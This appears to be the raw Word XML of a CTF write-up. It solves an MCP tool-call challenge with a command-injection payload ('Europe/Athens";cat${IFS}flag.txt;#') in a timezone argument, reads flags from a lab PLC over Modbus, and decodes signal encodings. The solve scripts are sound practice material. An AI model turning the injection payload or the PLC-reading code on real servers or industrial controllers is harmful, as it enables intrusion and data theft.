      <w:proofErr w:type="spell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</w:p>
    <w:p w14:paraId="129605E5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10.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messages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660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SSEClient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sse_url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session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session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06CE674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first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next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messages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</w:p>
    <w:p w14:paraId="0CD1B5D4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12.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m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search</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart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proofErr w:type="gram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"session_id</w:t>
      </w:r>
      <w:proofErr w:type="spell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=([a-f0-9]+)"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43936A4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13.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1F22D5D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14.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raise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660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SystemExit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54022A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>❌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Couldn't get </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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session_id</w:t>
      </w:r>
      <w:proofErr w:type="spell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2C2FEF5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15.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sid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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m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group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DBBE35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16.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post_url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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"http://challenge.hackthat.site:43130/messages/?session_id={sid}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0E0F8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17.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2774082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18.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2) Initialize MCP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F27C1E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19.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89049EA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20.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"jsonrpc"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"2.0"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"id"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"method"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"initialize"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2707DA2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"params"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:{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409091C8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22.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"protocolVersion"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"2024-11-05"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05358F02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23.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"capabilities"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:{},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BC0209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24.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clientInfo</w:t>
      </w:r>
      <w:proofErr w:type="spell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:{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"name"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"challenge_solution"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"version"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"1.0"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1A709F5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25.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7035CB0D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26.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ABBA3C3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27.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session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post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post_url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B865B5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28.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wait for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/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init</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/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reply</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6BCB5D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29.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msg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messages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E657AD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30.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data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loads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msg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6264B98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get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"id"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)==</w:t>
      </w:r>
      <w:r w:rsidRPr="0054022A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62ED6C4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32.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send initialized notification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF20129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33.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session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post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post_url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={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"jsonrpc"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"2.0"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"method"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"notifications/initialized"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})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1823413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34.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1B897AC1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35.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436F231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36.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3) Exploit: call </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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get_current_time</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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with injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF5FE7E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37.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   Note: no literal spaces allowed, so we use ${IFS} to stand in for a space.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A31068E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38.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injection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'Europe/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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Athens";cat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart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${IFS}</w:t>
      </w:r>
      <w:proofErr w:type="gram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flag.txt;#'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D56D2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39.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cat_call</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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7CA06EE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lastRenderedPageBreak/>
        <w:t xml:space="preserve">40.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"jsonrpc"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"2.0"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"id"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"method"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"tools/call"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C78990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"params"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:{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6994513A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42.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"name"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get_current_time</w:t>
      </w:r>
      <w:proofErr w:type="spell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79FCFF40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43.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"arguments"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:{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tz</w:t>
      </w:r>
      <w:proofErr w:type="spell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injection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79D92AA4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44.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B45C11A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45.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E0DCF18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46.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session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post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post_url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cat_call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2CEC4F4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47.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1669A6F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48.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4) Listen for the tool’s result (either an "id":2 result or a tools/result notification)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383F6D57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49.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flag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74527459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50.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msg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messages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A46810E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DD1C058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52.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pkt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loads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msg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2CCA3AC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53.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660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>JSONDecodeError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FAFBDB3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54.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240D490E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55.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CB86D70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56.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Case A: direct JSON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noBreakHyphen/>
        <w:t>RPC reply</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4B22E0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57.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pkt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get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"id"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)==</w:t>
      </w:r>
      <w:r w:rsidRPr="0054022A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"result"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pkt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F85C643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58.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out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pkt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"result"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7A13DED7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59.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758CA8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60.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Case B: a tools/result notification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545E709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elif</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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pkt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get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"method"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)==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"tools/result"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and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pkt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get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"params"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,{}).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get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"id"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)==</w:t>
      </w:r>
      <w:r w:rsidRPr="0054022A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61218A3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62.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out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pkt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"params"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][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"result"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3F47FF81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63.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821CCFB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64.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3C1A03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65.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462C0817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66.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23F3758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67.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out might be a string or a more structured object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3AEE67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68.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text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out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isinstance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out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str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json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dumps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out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5D8D18A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69.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9EB792B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70.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880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Search for our ECSC flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69943EE2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m2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search</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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gramStart"/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"(ECSC\{.*?\}</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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)"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text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73D6340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72.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m2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91597D2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73.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flag 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m2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group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C6E19A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74.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"Flag found:"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flag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6DABE49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75.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0C2CD3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76.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"No flag in tool output. Raw output:"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C477086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77.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text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BB4B1B3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78.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1E1204E2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79.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452184F" w14:textId="7777777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80.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flag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6889ABE" w14:textId="6A263EB7" w:rsidR="0054022A" w:rsidRPr="0054022A" w:rsidRDefault="005402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151479"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0054022A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">81. </w:t>
      </w:r>
      <w:r w:rsidRPr="0054022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4022A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54022A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"Exploit ran but flag not located."</w:t>
      </w:r>
      <w:r w:rsidRPr="0054022A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A3FB7B1" w14:textId="77777777" w:rsidR="008C41E7" w:rsidRDefault="008C41E7" w:rsidP="0054022A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B9A9261" w14:textId="6128F482" w:rsidR="0054022A" w:rsidRDefault="008C41E7" w:rsidP="0054022A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C41E7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Got the flag:</w:t>
      </w:r>
      <w:r w:rsidR="0054022A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="0054022A" w:rsidRPr="0054022A">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52032A37" wp14:editId="5E775F10">
            <wp:extent cx="4906060" cy="438211"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:docPr id="197355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16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3949" w14:textId="77777777" w:rsidR="00DE3BFE" w:rsidRPr="0054022A" w:rsidRDefault="00DE3BFE" w:rsidP="0054022A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A88DF1F" w14:textId="1C9E5A0C" w:rsidR="002A437D" w:rsidRDefault="00A513EE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7" w:name="_Toc203244065"/>
      <w:r w:rsidRPr="00A513EE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Holding Secrets</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="73104F39" w14:textId="3FF6FEA6" w:rsidR="00DE3BFE" w:rsidRPr="00132EF1" w:rsidRDefault="00132EF1" w:rsidP="00DE3BFE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00132EF1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>With the help of ChatGPT I searched through the registers, until I found the correct ones:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74ECFB4D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lastRenderedPageBreak/>
        <w:t xml:space="preserve"> 1.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pymodbus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client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660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ModbusTcpClient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4271A4CB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2.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pymodbus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exceptions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660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ModbusException</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1CCBE846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3.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59A87D1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4.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Define the target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24593438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5.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IP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challenge.hackthat.site</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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</w:p>
    <w:p w14:paraId="0D351347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6.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PORT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37824</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4831307B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7.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SLAVE_ID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Slave ID that worked for you</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221DC689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8.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B56462A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 9.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Connect to the PLC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CEB5A3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10.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client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660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ModbusTcpClient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IP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port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PORT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01B1C24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11.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B13301A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12.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A291091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13.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client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connect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346D589A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14.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"Connected to PLC"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1ECE230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15.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flag_parts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57AE27E6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16.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F3D81F0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17.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Start reading from address 1000 and continue until we find the complete flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05AEB6CC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18.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start_address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1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA76516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19.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2DDC094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20.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"\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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nReading</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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50 holding registers starting at address {</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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start_address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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031C176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21.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result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client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read_holding_registers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start_address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50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slave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SLAVE_ID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FD7A195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22.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0E5EC98B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23.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isError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65668913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24.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registers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registers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="29A584DB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25.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"Register values:"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registers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DE68F10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26.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210B39EC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27.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Decode as ASCII (mask to 8 bits for each register)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B9D5CC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28.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current_part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join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chr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0xFF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registers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32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0xFF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126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24BBC63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29.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0E871489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30.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current_part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F2B74D4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31.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"ASCII decoded:"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current_part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12DD788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32.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flag_parts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current_part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6B2799E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33.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</w:p>
    <w:p w14:paraId="07F04398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34.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Check if we've found the closing brace</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275DE39B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35.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'}'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current_part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F16C6D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36.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63D97780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37.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8CA448A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38.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"No printable ASCII characters found"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2B43035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39.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If we hit a block with no printable characters, we might have passed the flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05AA4570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40. </w:t>
      </w:r>
      <w:proofErr w:type="gram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  <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7036879E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41.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</w:p>
    <w:p w14:paraId="76FD9F7F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42.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start_address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6666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>50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Move to the next block</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADCC8F0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43.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3159E7F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44.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"Error reading registers:"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F6E12A0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45.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6CCD6F92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46.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203E3717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47.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32EF1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Combine all flag parts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD43B5C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48.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full_flag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join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flag_parts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1F5EF46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49.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"\n=== FLAG ==="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2E90267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50.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>full_flag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00E2F89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51.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B42A05D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52.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60F0AE4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53.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"Failed to connect to PLC"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A21B774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lastRenderedPageBreak/>
        <w:t xml:space="preserve">54.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EF1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ModbusException</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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A87A2E6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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00132EF1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">55. 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32EF1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132EF1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"Modbus error:"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132EF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132EF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0812F85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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00132EF1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">56. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00132EF1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>finally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</w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7708AC3F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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00132EF1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">57. </w:t>
      </w:r>
      <w:r w:rsidRPr="00132EF1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132EF1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>client</w:t>
      </w:r>
      <w:r w:rsidRPr="00132EF1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00132EF1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>close</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00132EF1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C4F02A" w14:textId="77777777" w:rsidR="00132EF1" w:rsidRPr="00132EF1" w:rsidRDefault="00132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033208"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00132EF1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">58. </w:t>
      </w:r>
      <w:r w:rsidRPr="00132EF1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF04231" w14:textId="77777777" w:rsidR="00132EF1" w:rsidRDefault="00132EF1" w:rsidP="00DE3BFE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78F20FB0" w14:textId="753E7E74" w:rsidR="00132EF1" w:rsidRPr="00132EF1" w:rsidRDefault="00132EF1" w:rsidP="00DE3BFE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00132EF1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2848666D" w14:textId="51037064" w:rsidR="00132EF1" w:rsidRDefault="00132EF1" w:rsidP="00DE3BFE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00132EF1">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0BFB9262" wp14:editId="0AF36BA0">
            <wp:extent cx="5274310" cy="2096770"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="184241876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18761" name="Picture 1" descr="A computer screen shot of a black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C2CC" w14:textId="77777777" w:rsidR="00132EF1" w:rsidRPr="00DE3BFE" w:rsidRDefault="00132EF1" w:rsidP="00DE3BFE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5916B2DC" w14:textId="388F6DA2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8" w:name="_Toc203244066"/>
      <w:r w:rsidRPr="00A513EE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Pot Pouri</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="1101622D" w14:textId="79A76A27" w:rsidR="00417142" w:rsidRPr="00D12FD7" w:rsidRDefault="00D12FD7" w:rsidP="00417142">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D12FD7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Solve script:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A5B36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1.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#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E03E5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socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C4C48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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B56EE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66C5C6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decode_uart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6209B2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3BECFD9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</w:p>
    <w:p w14:paraId="0DC8415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8. </w:t>
      </w:r>
      <w:proofErr w:type="gram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10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567FCA7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Start bit must be 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F87674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08933C5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Resync until start bit found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137F563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byte_bits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9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][::-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Data bits LSB first</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171C1A3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chr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byte_bits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2C26380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</w:p>
    <w:p w14:paraId="513F1C2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10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Move to next frame</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D291C2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</w:p>
    <w:p w14:paraId="2D29DF4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A67A23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decode_manchester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4C65E9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"""Decode Manchester encoding - try both conventions"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3927751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candidates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39C3A99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24E664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Method 1: 01 -&gt; 0, 10 -&gt; 1 (IEEE 802.3 convention)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B6191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48EC7D4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38E563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pair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768F7FB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pair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'01'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A2428C2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</w:p>
    <w:p w14:paraId="583C962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elif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pair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'10'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75A5EB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29.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</w:p>
    <w:p w14:paraId="50F083E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601CEB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E646ED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6DFC1912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B5ABCF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630FA86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Method 2: 10 -&gt; 0, 01 -&gt; 1 (G.E. Thomas convention)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABBF6B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47F5BEE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9A867C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pair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0CA1ECF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pair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'10'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B0BEDD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</w:p>
    <w:p w14:paraId="53AFF02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elif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pair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'01'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F9BDD1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</w:p>
    <w:p w14:paraId="397E3AB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A9F332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87A539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E6457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804A0A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49320A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Return the best candidate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B574F5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F8AFBA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max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lambda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isalnum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 .,!?'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]))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E4B04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D4B444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3B86F8E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407E76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decode_nrzi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E45FFD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"""Decode NRZ-I (Non-Return-to-Zero Inverted) encoding"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E749A4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A4F27B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09B2E7A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F6EB60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Try different NRZI interpretations and return the best one</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454A371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candidates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4B30FDB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1825FC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Method 1: Standard NRZI - transition = 1, no transition = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A1FAC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6E1EDD8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3124EB6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70673E7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43D3F442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54E553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</w:p>
    <w:p w14:paraId="1928765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050295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</w:p>
    <w:p w14:paraId="5E4ECA9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</w:p>
    <w:p w14:paraId="0FBFEB5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50B4173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7EB4BB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8C4377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A90D2D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50F4FFD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Method 2: Include first bit as data, then apply NRZI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6208638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76DF0C4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65E60E2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45B8CCD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5D9777E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6DF8EF2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</w:p>
    <w:p w14:paraId="197B8BF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3B5697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</w:p>
    <w:p w14:paraId="519B887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</w:p>
    <w:p w14:paraId="56CF2AB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lastRenderedPageBreak/>
        <w:t xml:space="preserve"> 87.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64A5FD5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EF4535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89.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E2ED41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58ACD12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8EA022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Method 3: Inverted logic - no transition = 1, transition = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3461917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1E1699B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6414A5C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07288D0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39B6EED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9F5181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</w:p>
    <w:p w14:paraId="0AA981A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3E0652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</w:p>
    <w:p w14:paraId="7294349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</w:p>
    <w:p w14:paraId="3AB29F5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719854E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BFD080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52957F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E21A3B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B91467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Method 4: Inverted with first bit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F483D0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Invert first bit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215A4FE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20B7E4E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49D61EA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3663D71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F3FA46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</w:p>
    <w:p w14:paraId="3793312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4D26DC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</w:p>
    <w:p w14:paraId="37CB453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prev_bit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current_bit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0C2C00F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F2EBCD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F0FFA5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119.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302F0A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2D83BB2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C76F88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Method 5: Direct differential decoding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B28225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Start with first bit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBB17C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2D8C573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XOR current with </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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previous to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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get data bit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFB4AC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data_bit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str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]))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72706DA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data_bit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5E2CD82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796DE4B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129.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decoded_bits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7EC9E1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B7ACA2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0A916A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1D7B7A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Return the candidate with the most printable characters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAD3C1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FE7F21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max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candidates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lambda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isalnum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 .,!?'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]))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103F26C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61BEC87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6F1DCEA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58DD0C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139.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C905DA9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"""Convert bit string to ASCII, handling different alignments"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1965C25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results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6FDC271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6BD487C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Try different starting positions in case of misalignment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5368CE4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lastRenderedPageBreak/>
        <w:t xml:space="preserve">144.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offset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min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))):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76BD770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5D8CBC42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offset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B1F131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22CD88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byte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3D7CD99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149.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9B34DA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chr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byte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6EB66EB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32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ord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126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Printable ASCII</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C2FA56" w14:textId="77777777" w:rsidR="00D12FD7" w:rsidRPr="00086989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0869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result </w:t>
      </w:r>
      <w:r w:rsidRPr="00086989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0869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086989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</w:p>
    <w:p w14:paraId="3E0A9F9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8984DD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Stop if we hit non-printable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45EF654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C0E5B9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1DDDA70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B5D56D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6DA334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159.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1BEE003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Return the longest valid result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148AF428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max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results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results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31C5628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C6166C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163.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decode_hamming_7_4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FB1A22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"""Decode Hamming (7,4) error-correcting code"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA7CB8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6C36D2F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E47B23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Process in 7-bit chunks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8D684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7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1EE7879A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169.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7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3349DDD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33CF374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2F875F0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chunk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bits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7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7756568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chunk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7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6426CF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7D5ACCD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1F714C2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Hamming (7,4) positions: p1 p2 d1 p4 d2 d3 d4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5882DA9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Parity bits at positions 1, 2, 4 (0-indexed: 0, 1, 3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F09BB9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Data bits at positions 3, 5, 6, 7 (0-indexed: 2, 4, 5, 6)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236D46D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179.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242D96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p1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p4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d3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d4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chunk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499A381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C6628F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Check </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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parity</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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and correct if needed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363D589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s1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p1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d1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d2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d4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Parity </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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check</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7BF3FD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s2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p2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d1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d3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d4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Parity </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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check</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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2</w:t>
      </w:r>
    </w:p>
